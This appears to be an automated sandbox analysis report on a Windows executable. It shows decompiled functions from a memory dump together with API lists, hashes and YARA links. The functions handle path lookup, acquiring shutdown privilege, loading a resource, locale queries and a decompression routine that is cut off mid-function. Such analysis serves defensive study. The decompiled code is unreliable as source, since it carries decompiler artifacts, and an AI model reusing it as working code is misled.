Opcode ID: ff04fd8dcd11e6fbafa61476d2b9ef1a7874464dd62cbe148c55b2defef5a7c5
Instruction ID: d4de7230741a84b6279af0e8d68159cf60326ecd709791186f7f3d6a8192444b
Opcode Fuzzy Hash: ff04fd8dcd11e6fbafa61476d2b9ef1a7874464dd62cbe148c55b2defef5a7c5
Instruction Fuzzy Hash: 83D0E9B17553009BEB90FF794DC1B023BD96F08740F11447A6508EA286E674D454C654

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405BEC, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 152
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00405BEC(WCHAR* __eax, int __edx) {
				WCHAR* _v8;
				int _v12;
				WCHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				signed int _t105;
				signed int _t106;
				intOrPtr* _t107;
				WCHAR* _t114;
				WCHAR* _t116;
				short* _t117;
				void* _t118;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_v20 = GetModuleHandleW(L"kernel32.dll");
				if(_v20 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t116 =  &(_v8[2]);
						goto L10;
					} else {
						if(_v8[1] == 0x5c) {
							_t117 = E00405BC8( &(_v8[2]));
							if( *_t117 != 0) {
								_t17 = _t117 + 2; // 0x2
								_t116 = E00405BC8(_t17);
								if( *_t116 != 0) {
									L10:
									_t105 = _t116 - _v8;
									_t106 = _t105 >> 1;
									if(_t105 < 0) {
										asm("adc ebx, 0x0");
									}
									lstrcpynW( &_v1134, _v8, _t106 + 1);
									while( *_t116 != 0) {
										_t114 = E00405BC8( &(_t116[1]));
										_t53 = _t114 - _t116;
										_t54 = _t53 >> 1;
										if(_t53 < 0) {
											asm("adc eax, 0x0");
										}
										if(_t54 + _t106 + 1 <= 0x105) {
											_t59 = _t114 - _t116;
											_t60 = _t59 >> 1;
											if(_t59 < 0) {
												asm("adc eax, 0x0");
											}
											lstrcpynW( &_v1134 + _t106 + _t106, _t116, _t60 + 1);
											_v20 = FindFirstFileW( &_v1134,  &_v612);
											if(_v20 != 0xffffffff) {
												FindClose(_v20);
												if(lstrlenW( &(_v612.cFileName)) + _t106 + 1 + 1 <= 0x105) {
													 *((short*)(_t118 + _t106 * 2 - 0x46a)) = 0x5c;
													lstrcpynW( &(( &_v1134 + _t106 + _t106)[1]),  &(_v612.cFileName), 0x105 - _t106 - 1);
													_t106 = _t106 + lstrlenW( &(_v612.cFileName)) + 1;
													_t116 = _t114;
													continue;
												}
											}
										}
										goto L23;
									}
									lstrcpynW(_v8,  &_v1134, _v12);
								}
							}
						}
					}
				} else {
					_t107 = GetProcAddress(_v20, "GetLongPathNameW");
					if(_t107 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t107() == 0) {
							goto L4;
						} else {
							lstrcpynW(_v8,  &_v1134, _v12);
						}
					}
				}
				L23:
				return _v16;
			}

0x00405bf8
0x00405bfb
0x00405c01
0x00405c0e
0x00405c15
0x00405c5a
0x00405c61
0x00405ca1
0x00000000
0x00405c63
0x00405c6b
0x00405c7c
0x00405c82
0x00405c88
0x00405c90
0x00405c96
0x00405ca4
0x00405ca6
0x00405ca9
0x00405cab
0x00405cad
0x00405cad
0x00405cbf
0x00405d8e
0x00405cd1
0x00405cd5
0x00405cd7
0x00405cd9
0x00405cdb
0x00405cdb
0x00405ce6
0x00405cee
0x00405cf0
0x00405cf2
0x00405cf4
0x00405cf4
0x00405d07
0x00405d1f
0x00405d26
0x00405d30
0x00405d4c
0x00405d4e
0x00405d78
0x00405d8a
0x00405d8c
0x00000000
0x00405d8c
0x00405d4c
0x00405d26
0x00000000
0x00405ce6
0x00405da7
0x00405da7
0x00405c96
0x00405c82
0x00405c6b
0x00405c17
0x00405c25
0x00405c29
0x00000000
0x00405c2b
0x00405c2b
0x00405c36
0x00405c3a
0x00405c3f
0x00000000
0x00405c41
0x00405c50
0x00405c50
0x00405c3f
0x00405c29
0x00405dac
0x00405db5

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00407574,?,00000000), ref: 00405C09
GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00405C20
lstrcpynW.KERNEL32(?,?,?), ref: 00405C50
lstrcpynW.KERNEL32(?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405CBF
lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D07
FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D1A
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D30
lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?,00000000), ref: 00405D3C
lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574,?), ref: 00405D78
lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,00407574), ref: 00405D84
lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00405DA7

Strings

\, xrefs: 00405D4E
kernel32.dll, xrefs: 00405C04
GetLongPathNameW, xrefs: 00405C17

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 3245196872-3908791685
Opcode ID: 1253a85fb23fe974578941fb111989e320402073ff3a7dddb8b82e84d419481d
Instruction ID: c2074287e695d44b88807d81ef8362fcd301c369dd62e3440cf0f4018af864f0
Opcode Fuzzy Hash: 1253a85fb23fe974578941fb111989e320402073ff3a7dddb8b82e84d419481d
Instruction Fuzzy Hash: DB515071A006199BDB10DAA9CC89ADF73BCEF48310F1445B7A604F7291E778AE408F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E538, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040E538() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				intOrPtr* _t6;
				int _t7;

				_t6 =  *0x412c7c; // 0x4127d8
				if( *_t6 != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}

0x0040e53b
0x0040e543
0x0040e5a0
0x0040e5a4
0x0040e5ac
0x00000000
0x0040e5ae
0x0040e555
0x0040e567
0x0040e56c
0x0040e574
0x0040e58e
0x0040e59a
0x00000000
0x00000000
0x00000000
0x0040e59c
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0040E548
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E54E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040E567
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E58E
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E593
ExitWindowsEx.USER32(00000002,00000000), ref: 0040E5A4

Strings

SeShutdownPrivilege, xrefs: 0040E560

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 73c640dd25bf0da1a066829e78cec9cf5526ed5c6ab4e34b88ea435bccd2a059
Instruction ID: ae4826e5ab51033c7cebb5d2f9562618bb8fce06cce608ca78d8d7bd7c41feda
Opcode Fuzzy Hash: 73c640dd25bf0da1a066829e78cec9cf5526ed5c6ab4e34b88ea435bccd2a059
Instruction Fuzzy Hash: DAF04F70255302BAE610AAA68C07F6B71885B40B0CF544C3AF641FA1C1F7BDD525866E

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE14, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EE14() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E0040EC58();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E0040EC58();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E0040EC58();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E0040EC58();
				}
				return _t12;
			}

0x0040ee23
0x0040ee27
0x0040ee29
0x0040ee29
0x0040ee39
0x0040ee3b
0x0040ee3b
0x0040ee48
0x0040ee4c
0x0040ee4e
0x0040ee4e
0x0040ee59
0x0040ee5d
0x0040ee5f
0x0040ee5f
0x0040ee67

APIs

FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,00411893,00000000,00411E26,?,00000001,00000000,00000002,00000000,00411E7A,?,00000000,00411EBE), ref: 0040EE1E
SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,00411893,00000000,00411E26,?,00000001,00000000,00000002,00000000,00411E7A), ref: 0040EE31
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,00411893,00000000,00411E26,?,00000001,00000000,00000002,00000000), ref: 0040EE43
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,00411893,00000000,00411E26,?,00000001,00000000,00000002), ref: 0040EE54

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: beedabd750f458dd06f1c9f94445ebe4908f2dd77a18a1ac7d15fc2b28cb6172
Instruction ID: 9a1a894cb87de906872dbc2c4e5ff6763d0dc0ebe58e3aebe34ffc217bd0bdf7
Opcode Fuzzy Hash: beedabd750f458dd06f1c9f94445ebe4908f2dd77a18a1ac7d15fc2b28cb6172
Instruction Fuzzy Hash: ECE09A8678934A25F51536F748CBB2A41485B2974EF01083FB705792C3DEBDCC78416E

Uniqueness

Uniqueness Score: -1.00%

Function 0040805C, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040805C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, WCHAR* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				short _v24;
				signed int _v28;
				intOrPtr _v117;
				intOrPtr* _t28;
				WCHAR* _t29;
				int _t30;
				short _t35;
				intOrPtr _t38;
				WCHAR* _t43;
				intOrPtr* _t44;
				short _t53;
				short _t55;

				_t28 = __eax +  *__eax;
				 *_t28 =  *_t28 + _t28;
				 *__edx =  *__edx + __ebx;
				 *_t28 =  *_t28 + _t28;
				 *_t28 =  *_t28 + _t28;
				_v117 = _v117 + __edx;
				_push(__ebx);
				_t29 = _a8;
				if(_t29 == 0) {
					_t29 = 0;
				}
				_t30 = GetDiskFreeSpaceW(_t29,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t53 = _v24;
				_t35 = E004058EC(_v28, _t53, _v16, 0);
				_t43 = _a8;
				 *_t43 = _t35;
				_t43[2] = _t53;
				_t55 = _v24;
				_t38 = E004058EC(_v28, _t55, _v20, 0);
				_t44 = _a12;
				 *_t44 = _t38;
				 *(_t44 + 4) = _t55;
				return _t30;
			}

0x0040805c
0x0040805e
0x00408061
0x00408063
0x00408065
0x00408067
0x0040806e
0x0040806f
0x00408074
0x00408076
0x00408076
0x00408089
0x00408098
0x0040809b
0x004080a8
0x004080ab
0x004080b0
0x004080b3
0x004080b5
0x004080c2
0x004080c5
0x004080ca
0x004080cd
0x004080cf
0x004080d8

APIs

GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 00408089

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 1b7c22238b0c46b284b2b107f6e5e28a964c48cdf51e692455e1591c4b1c28f1
Instruction ID: a068575fb17e70d0eb2dd941d71b6181fb06f7ad23ffcb3780b10a2596b4250a
Opcode Fuzzy Hash: 1b7c22238b0c46b284b2b107f6e5e28a964c48cdf51e692455e1591c4b1c28f1
Instruction Fuzzy Hash: C01112B5E05249AFCB01DFA9C8818EFBBF5EF89300B14C5AAE405EB251D6315E05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00411F58, Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

A, xrefs: 004120C0

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: A
API String ID: 0-3582347099
Opcode ID: afb60e1e5df2a2a85171c5941b75c825761cfa82270ef2d3c57e723c2faf4850
Instruction ID: 9202b3b2e669a32c0057a263ba23aa2c584203a5c74b6d2290577fe0c26bb03f
Opcode Fuzzy Hash: afb60e1e5df2a2a85171c5941b75c825761cfa82270ef2d3c57e723c2faf4850
Instruction Fuzzy Hash: A7719B6194E3C19FDB038B7898A95917FB0AE1722831F81DBC0C5CF4A3D29D885AC727

Uniqueness

Uniqueness Score: -1.00%

Function 00408EB4, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00408EB4(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				short _v516;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00404C98(_t10, _t18);
				}
				return E00404DD4(_t10, _t5 - 1,  &_v516, _t19);
			}

0x00408ebf
0x00408ec1
0x00408ed2
0x00408ed7
0x00408ed9
0x00000000
0x00408ef1
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00408ED2

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 246054f9c36c1f2196f49bbd947a24d2e959c1ac7231b52c9a5afb00355492ba
Instruction ID: efd930654affab819bb145c5b770efe1d407367608a80b1910e27d3113095914
Opcode Fuzzy Hash: 246054f9c36c1f2196f49bbd947a24d2e959c1ac7231b52c9a5afb00355492ba
Instruction Fuzzy Hash: B5E0927170021857E714A5998D869E7725C9B88300F00017FBA05E7383ED759D5043E9

Uniqueness

Uniqueness Score: -1.00%

Function 00408F00, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00408F00(int __eax, signed int __ecx, int __edx) {
				short _v16;
				signed int _t5;
				signed int _t10;

				_push(__ecx);
				_t10 = __ecx;
				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t10;
				} else {
					_t5 = _v16 & 0x0000ffff;
				}
				return _t5;
			}

0x00408f03
0x00408f04
0x00408f1a
0x00408f22
0x00408f1c
0x00408f1c
0x00408f1c
0x00408f28

APIs

GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040A65C,00000000,0040A886,?,?,00000000,00000000), ref: 00408F13

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 94732180e3b9d4c1534f10bd835daa7b5d390fea32fce7ec4f8fcd00424c145c
Instruction ID: c1a5af872d8d8e0d8faaa3b155c0f045d42fbc39b27c6cde3df4525be18a7e6a
Opcode Fuzzy Hash: 94732180e3b9d4c1534f10bd835daa7b5d390fea32fce7ec4f8fcd00424c145c
Instruction Fuzzy Hash: 20D0A7B630922076E620916B7E45D7766DDCBC4772F10443FBA89D7281D674CC05D379

Uniqueness

Uniqueness Score: -1.00%

Function 0040E640, Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E640(signed int __eax) {
				short _v8;
				signed int _t6;

				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
				if(_t6 <= 0) {
					return _t6 | 0xffffffff;
				}
				return _v8;
			}

0x0040e656
0x0040e65d
0x00000000
0x0040e664
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,0040E73F), ref: 0040E656

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6308b6ad815ab94f5877452a5c18b2a5c5f0fe134cd48218108c47e1a222a2b6
Instruction ID: 61ad4570fdc9bd1f637c2ab62d59952224da12b932db04316d1523c8ac21b311
Opcode Fuzzy Hash: 6308b6ad815ab94f5877452a5c18b2a5c5f0fe134cd48218108c47e1a222a2b6
Instruction Fuzzy Hash: 2BD05BA1514308FAF900C1E66D42D7672DCD704728F500A27F614D61C1D567EE109225

Uniqueness

Uniqueness Score: -1.00%

Function 0041259C, Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

&A, xrefs: 004126D0

Memory Dump Source

Source File: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: &A
API String ID: 0-2212290781
Opcode ID: c16e09d598d5a18e8e0fe80d758bf5fad70bb83abc8cb1f9b772681759e70da3
Instruction ID: ba5a24cc7ee04f00cef3f4a972616c23e20bb86216c8641e4eac677c5796d3ea
Opcode Fuzzy Hash: c16e09d598d5a18e8e0fe80d758bf5fad70bb83abc8cb1f9b772681759e70da3
Instruction Fuzzy Hash: EB51BC6244E3C09FD3274B3489751957FB0AE6B22476A02CFC4C5CF4B3DA6E199AC726

Uniqueness

Uniqueness Score: -1.00%

Function 0041201D, Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

A, xrefs: 004120C0

Memory Dump Source

Source File: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: A
API String ID: 0-3582347099
Opcode ID: 221c5928d87845f2dfc6b35d6db546c42f583eb31c30d4f3e09bfd71ad5b9389
Instruction ID: 52b66527c0000f71960bb8c3881e856246f7ebdf2e510e7326e49886184ab70c
Opcode Fuzzy Hash: 221c5928d87845f2dfc6b35d6db546c42f583eb31c30d4f3e09bfd71ad5b9389
Instruction Fuzzy Hash: 78619B6194E3C19FDB138B7898A95917FB0AE1722831F81DBC4C5CF4A3D299885EC727

Uniqueness

Uniqueness Score: -1.00%

Function 0040D33C, Relevance: .5, Instructions: 545
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040D33C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				char* _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v89;
				char _v96;
				signed int _v100;
				signed int _v104;
				short* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _t370;
				void* _t375;
				signed int _t377;
				signed int _t381;
				signed int _t389;
				signed int _t395;
				signed int _t411;
				intOrPtr _t422;
				signed int _t426;
				signed int _t435;
				void* _t448;
				signed int _t458;
				char _t460;
				signed int _t474;
				char* _t503;
				signed int _t508;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t622;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v8 + 0x10));
				_v24 = 0;
				_v32 = (1 <<  *(_v8 + 8)) - 1;
				_v36 = (1 <<  *(_v8 + 4)) - 1;
				_v40 =  *_v8;
				_t617 =  *((intOrPtr*)(_v8 + 0x34));
				_t474 =  *(_v8 + 0x44);
				_v44 =  *((intOrPtr*)(_v8 + 0x38));
				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
				_v52 =  *((intOrPtr*)(_v8 + 0x40));
				_v56 =  *((intOrPtr*)(_v8 + 0x48));
				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
				_v64 =  *((intOrPtr*)(_v8 + 0x30));
				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
				_v72 =  *((intOrPtr*)(_v8 + 0xc));
				_t616 =  *((intOrPtr*)(_v8 + 0x28));
				_v128 =  *((intOrPtr*)(_v8 + 0x20));
				_v124 =  *((intOrPtr*)(_v8 + 0x24));
				_v120 = _v12;
				_v136 =  *((intOrPtr*)(_v8 + 0x14));
				_v132 =  *((intOrPtr*)(_v8 + 0x18));
				 *_a4 = 0;
				if(_v56 == 0xffffffff) {
					return 0;
				}
				__eflags = _v72;
				if(_v72 == 0) {
					_v68 =  &_v76;
					_v72 = 1;
					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
				}
				__eflags = _v56 - 0xfffffffe;
				if(_v56 != 0xfffffffe) {
					L12:
					_v108 = _v16 + _v24;
					while(1) {
						__eflags = _v56;
						if(_v56 == 0) {
							break;
						}
						__eflags = _v24 - _a8;
						if(_v24 < _a8) {
							_t458 = _t616 - _t617;
							__eflags = _t458 - _v72;
							if(_t458 >= _v72) {
								_t458 = _t458 + _v72;
								__eflags = _t458;
							}
							_t460 =  *((intOrPtr*)(_v68 + _t458));
							 *((char*)(_v68 + _t616)) = _t460;
							 *_v108 = _t460;
							_v24 = _v24 + 1;
							_v108 = _v108 + 1;
							_t616 = _t616 + 1;
							__eflags = _t616 - _v72;
							if(_t616 == _v72) {
								_t616 = 0;
								__eflags = 0;
							}
							_t116 =  &_v56;
							 *_t116 = _v56 - 1;
							__eflags =  *_t116;
							continue;
						}
						break;
					}
					__eflags = _t616;
					if(_t616 != 0) {
						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
					}
					__eflags = 0;
					_v116 = 0;
					_v112 = 0;
					while(1) {
						L24:
						_v108 = _v16 + _v24;
						__eflags = _v24 - _a8;
						if(_v24 >= _a8) {
							break;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_v88 = _v24 + _v60 & _v32;
							__eflags = _v116;
							if(_v116 != 0) {
								break;
							}
							__eflags = _v112;
							if(_v112 == 0) {
								_t370 = E0040D094((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
								__eflags = _t370;
								if(_t370 != 0) {
									_t375 = E0040D094(_t474 + _t474 + _v20 + 0x180,  &_v136);
									__eflags = _t375 != 1;
									if(_t375 != 1) {
										_v52 = _v48;
										_v48 = _v44;
										_v44 = _t617;
										__eflags = _t474 - 7;
										if(__eflags >= 0) {
											_t377 = 0xa;
										} else {
											_t377 = 7;
										}
										_t474 = _t377;
										_v56 = E0040D244(_v20 + 0x664, _v88,  &_v136, __eflags);
										_t503 =  &_v136;
										__eflags = _v56 - 4;
										if(_v56 >= 4) {
											_t381 = 3;
										} else {
											_t381 = _v56;
										}
										_v100 = E0040D11C((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
										__eflags = _v100 - 4;
										if(_v100 < 4) {
											_t618 = _v100;
										} else {
											_v104 = (_v100 >> 1) - 1;
											_t524 = _v104;
											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
											__eflags = _v100 - 0xe;
											if(_v100 >= 0xe) {
												_t395 = E0040D034( &_v136, _t524, _v104 + 0xfffffffc);
												_t618 = _t622 + (_t395 << 4) + E0040D160(_v20 + 0x644,  &_v136, 4);
											} else {
												_t618 = _t622 + E0040D160(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
											}
										}
										_t617 = _t618 + 1;
										__eflags = _t617;
										if(_t617 != 0) {
											L82:
											_v56 = _v56 + 2;
											__eflags = _t617 - _v64;
											if(_t617 <= _v64) {
												__eflags = _v72 - _v64 - _v56;
												if(_v72 - _v64 <= _v56) {
													_v64 = _v72;
												} else {
													_v64 = _v64 + _v56;
												}
												while(1) {
													_t389 = _t616 - _t617;
													__eflags = _t389 - _v72;
													if(_t389 >= _v72) {
														_t389 = _t389 + _v72;
														__eflags = _t389;
													}
													_v25 =  *((intOrPtr*)(_v68 + _t389));
													 *((char*)(_v68 + _t616)) = _v25;
													_t616 = _t616 + 1;
